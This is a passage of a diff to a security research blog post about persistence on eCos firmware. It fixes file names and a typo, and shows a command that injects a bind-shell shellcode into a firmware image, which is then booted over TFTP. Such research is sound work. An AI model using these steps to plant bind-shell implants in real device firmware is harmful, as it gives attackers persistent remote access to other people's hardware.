ecos-wtf/website/_posts/2021-03-15-ecos-persistence-firmware.md

         f.write(padding)
 {% endhighlight %}

 Let's inject our shellcode:

 {% highlight sh %}
-cp implant.in implant.shellcode
+cp firmware.clean firmware.implant
-./inject.py implant.shellcode ~/git/ecoshell/bindshell_thread.bin 0x805f4434 0x805f4b28
+./inject.py firmware.implant ~/git/ecoshell/bindshell_thread.bin 0x805f4434 0x805f4b28
 Available space: 1780 bytes
 Overwriting firmware file with shellcode.
 {% endhighlight %}

 We repack it, serve it over TFTP and let it boot.
 As we can see from the boot logs below, our malicious code is executing successfully.

-Note that if we wanted our code to run in a single window without being prempted by the scheduler, we could add calls to `cyg_scheduler_lock` and `cyg_scheduler_unlock`.
+Note that if we wanted our code to run in a single window without being preempted by the scheduler, we could add calls to `cyg_scheduler_lock` and `cyg_scheduler_unlock`.
 This way our logs would no longer be spread around in the boot logs :)

 {% highlight asm %}
 --boot--